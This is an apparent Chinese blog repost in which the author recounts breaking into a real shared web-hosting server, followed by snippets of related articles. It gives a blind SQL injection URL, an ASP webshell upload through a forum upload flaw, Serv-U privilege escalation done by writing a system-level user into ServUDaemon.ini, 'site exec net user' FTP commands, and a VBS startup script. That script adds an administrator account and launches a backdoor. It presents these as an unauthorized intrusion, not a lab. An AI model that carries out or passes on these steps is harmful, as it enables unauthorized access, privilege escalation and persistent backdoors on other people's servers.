虚拟机服务器渗透,对一台虚拟主机服务器的渗透 -电脑资料

最新推荐文章于 2024-05-06 22:42:57 发布
最新推荐文章于 2024-05-06 22:42:57 发布
阅读量467 收藏 1
点赞数 1
文章标签: 虚拟机服务器渗透

前几天听一树说了惊云下载系统的漏洞

问题文件出在admin/user.asp

提交

http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1

就相当于:

select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1’"

利用access注入得到管理员密码

上面有一个文件upfile.htm

手工利用了下动网的upfile.asp漏洞

就成功上传了个asp木马

然后那个虚拟主机的c,d盘是NTFS分区

不能访问E盘装着servu,php,webmail,

F盘是虚拟站点

servu安装目录可写~

本来打算替换他servu文件的~但是觉的太麻烦

还容易让管理员怀疑

想起servu的本地提升来了

在自己计算机上装了个servu

添加了一个用户,设置为系统管理员,目录C:\,具有可执行权限

然后去servu安装目录里看ServUDaemon.ini

格式是这样的

[GLOBAL]

Version=5.0.0.11

LocalSetupPassword=072C63105200180D5C07170A7E3E

LocalSetupPortNo=60628

ProcessID=972

[DOMAINS]

Domain1=192.168.0.102||21|向导产生域|1|0|0

Domain2=192.168.0.102||2121|123|2|0|0

[Domain1]

User1=www|1|0

[USER=www|1]

Password=ih0C292E1AC82920B7F384007F302A1296

HomeDir=D:\xiaoben

TimeOut=600

Note1="Wizard generated account"

Access1=D:\xiaoben|RLPWAMCD

SKEYValues=

[Domain2]

User1=rover|1|0

User2=123|1|0

[USER=rover|2]

Password=dx5D12C060F16C7166779414FA038E881D

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

SKEYValues=

[USER=123|2]

Password=kv3F6EED70340AD1478ADF95963A07FD00

HomeDir=c:\

TimeOut=600

Access1=C:\|RWAMLCDP

SKEYValues=

----------------

其中rover用户就是我添加的那个

在虚拟主机的网页木马上打开虚拟机的ServUDaemon.ini

访照我本地的INI写进一个用户进去

User1=rover|1|0

[USER=rover|2]

Password=dx5D12C060F16C7166779414FA038E881D

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

SKEYValues=

保存~

用我新建的用户和密码连接~

好的,还是连上了

ftp

ftp>open ip

Connected to ip.

220 Serv-U FTP Server v5.0.0.4 for WinSock ready...

User (ip:(none)): id //输入构造的用户

331 User name okay, please send complete E-mail address as password.

Password:password //密码

230 User logged in, proceed.

ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录,对一台虚拟主机服务器的渗透》(https://www.unjs.com)。

250 Directory changed to /WINNT

ftp>cd system32 //进入system32目录

250 Directory changed to /WINNT/system32

ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe文件加用户。

提示没有权限~郁闷~

但是我们有对C盘的访问权限了是不~hoho~

把后门(server.exe)传他system32目录

然后写一个VBs教本

set wshshell=createobject ("wscript.shell")

a=wshshell.run ("cmd.exe /c net user tsinternetuser rover1234 /add",0)

b=wshshell.run ("cmd.exe /c net localgroup Administrators tsinternetuser /add",0)

b=wshshell.run ("cmd.exe /c net user tsinternetuser /active:yes",0)

b=wshshell.run ("cmd.exe /c server.exe",0)

存为HELP.vbe

这个教本的作用是修改tsinternetuser用户密码为rover1234

并且提升为管理员

然后执行system32目录下的server.exe

把这个教本传他C:\Documents and Settings\All Users\「开始」菜单\程序\启动

目录

这样管理员只要一登陆就会执行那个教本~

接下来就是等了~

等他登陆~

等了一段时间(看了一部蜘蛛侠的时间吧)~

连接后门~得到admin权限的shell

hoho~

接下来是善后工作了~就不说了

今天心情非常糟~有一些事情压的我喘不过气来

考试的时候当老师面把卷子撕了,然后扬步走了~

妈妈的~过程写的很乱~见谅

ElemeFe
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali_Linux iso镜像在Vmware中如何安装(安装教程)???
05-11
主机名在网络环境中用于唯一标识一台计算机,应避免使用特殊字符和空格,保持简洁且易于记忆。 - 建议遵循域名反向解析的规则,例如,如果你的域名是example.com,主机名可以是kali.example.com。 6. **分区和文件...
虚拟机简要教程虚拟机 虚拟机
10-11
虚拟机是一种计算机软件,它允许用户在一台物理机器上运行多个独立的操作系统实例,而无需在硬件上安装它们。这个过程是通过模拟硬件环境来实现的,使得每个虚拟机都有自己的处理器、内存、磁盘和其他资源,使得它们...
黑客对一台虚拟主机服务器渗透
网络专栏
06-10 768
前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1’=’1 就相当于: select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>3
2024年网络安全最全【网络安全】渗透测试入门与Kali Linux系统虚拟机安装,我在美团网络安全研发岗工作的那5年
最新发布
2401_84263434的博客
05-06 792
为了帮助大家更好的学习网络安全,我给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
快速对虚拟主机进行渗透提权-黑客博客
weixin_33781606的博客
12-27 234
假期无聊,随便乱逛,来到了一个新加坡站点,网站很普通,估计是asp+Access的站点,随手点开一个页面,用“-0”、“-1”简单测试发现存在注入。立马将网址丢到啊D中,不一会儿,啊D就成功猜解出后台用户名密码。密码被md5加密,在cmd5网上查得原文,登录后台,有种似曾相识的感觉,估计是国内的程序员开发的。后台有上传和数据库备份功能,马上上传图片木马,利用数据库备份顺利得到webshell。利用...
一次对于虚拟主机渗透
weixin_30846599的博客
01-17 126
一,起因 无意中看到一个私服,速度很不错,于是想试一试它的安全性。(www.mirxxx.com) 二,踩点 IIS5.0+SP4,估计有硬件防火墙,开21.25.80端口,这是一个空间商网站。所以就别想从系统漏洞入手,只能从Web入手。这次我要的网站是www.mirxxx.com. 三,旁注 找了动网最新版的其它网站,利用默认数data/dvbbs7...
HACKINOS虚拟机渗透测试
m0_65968201的博客
11-12 615
hackinos渗透过程
工业互联网安全测试技术:工控安全渗透工具.pptx
06-25
例如,拿到一台同生产系统中设备具有相同型号的备用PLC,对其进行编程后就可以直接插入到系统中。最佳的解决方法之一是使用虚拟化来对生产服务器和工作站进行复制。借助虚拟化解决方案,例如VMware的 vSphere、微软...
虚拟化云计算
08-01
在配置上限方面,vSphere显著提升了对高性能服务器的支持,每个虚拟机可支持8个CPU和255GB内存,主机可容纳512个CPU和1TB物理内存,最大可运行320台虚拟机,极大地扩展了虚拟化的能力。 vSphere的云计算基础架构...
绝对好用的虚拟网卡
12-11
3. **网络安全**:在进行网络安全测试或渗透测试时,可以通过虚拟网卡创建隔离的测试环境,避免对实际网络造成影响。 4. **负载均衡**:企业级服务器可以通过虚拟网卡实现网络流量的负载均衡,提高网络服务的可用性...
网络安全 渗透 攻防1(虚拟机安装部署,IP地址详解)
Shany_Ming的博客
11-23 8667
第一章 虚拟化架构与系统部署 关于本章 一.传统运行模式 一台计算机同时只能运行一个操作系统 二.虚拟机运行架构 虚拟机运行架构 1.寄居架构 2.原生架构 1.寄居架构(实验环境、测试环境) a)虚拟机作为应用软件安装在操作系统上 b)可以在此应用软件上安装多个操作系统 c)直接安装在硬件上的系统为宿主 2、原生架构(生产环境) a)虚拟机软件直接安装在计算机硬件上 b)虚拟机本身就是一个操作系统 c)在这个虚拟机中可以同时运行多个操作系统 ...
服务器里的虚拟机,云服务器里的虚拟机
weixin_39523835的博客
08-10 290
服务器里的虚拟机 内容精选换一换用户可以在管理控制台对专属主机上的云服务器进行管理类操作,包括开机、关机、重启、删除。登录管理控制台。单击管理控制台左上角的,选择区域和项目。选择“计算 > 专属主机”。进入专属主机信息页面。进入专属主机信息页面。在专属主机列表中,单击专属主机的名称。进入该专属主机信息页面。进入该专属主机信息页面。在“专属主机上的云服务器”区域的云服务器GaussDB(DW...
【网络安全】渗透测试入门与Kali Linux系统虚拟机安装
fly_enum的博客
03-27 835
Kali Linux是基于Debian的linux发行版,包括很多的安全和取证方面的相关工具。它是由Offensive Security Ltd维护和资助。最先由Offensive Security的MatiAharoni和Devon Kearns通过重写Back Track来完成。Back Track是基于Ubuntu的linux发行版。
VMware虚拟机搭建渗透网络及原理解析
superprintf的博客
11-18 3867
这篇文章的写作顺序: 1.先熟悉VMware三种模式 本人是MacBook,如果你是windows电脑可以参考 https://blog.csdn.net/weixin_42442713/article/details/80903173 2.实验VMware三种模式 3.按照metasploit魔鬼训练营中的环境搭建网络(一个小公司网路模型) //# vmware网络配置的进阶请参照官网教程 //# https://docs.vmware.com/cn/VMware-Workstation-Pro/inde
渗透测试入门基础与Kali Linux系统虚拟机安装
m0_65364832的博客
01-15 1269
Kali Linux是基于Debian的linux发行版,包括很多的安全和取证方面的相关工具。它是由Offensive Security Ltd维护和资助。最先由Offensive Security的MatiAharoni和Devon Kearns通过重写Back Track来完成。Back Track是基于Ubuntu的linux发行版。
针对虚拟机渗透测试
weixin_34381687的博客
07-10 774
如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全?   什么是虚拟化   虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行。虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程。CPU的虚拟化技术可以单CPU模拟多CP...
渗透注入虚拟环境搭建
weixin_45735361的博客
02-10 149
首先我们需要从下面三个网站中分别下载phpstudy、sqli-labs、DVWA https://www.xp.cn https://github.com/Audi-1/sqli-labs http://www.dvwa.co.uk
00.VMware虚拟机快速搭建win10渗透测试工具集成环境
YouTheFreedom的博客
03-24 1244
本篇文章主要面向渗透测试初学者,利用VMware虚拟机快速搭建win10渗透测试工具集成环境。对虚拟机有所了解的同学可直接跳过前面的科普部份,直接查看VMware虚拟机导入部分快速搭建环境。
虚拟机中如何将一台linux服务器复制出来另一台
04-23
可以使用虚拟化软件的克隆功能来复制一台linux服务器到另一台虚拟机中。具体步骤如下: 1. 关闭要复制的虚拟机。 2. 在虚拟化管理器中选择该虚拟机,点击克隆。 3. 在克隆向导中,选择要复制的虚拟机所在的存储位置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值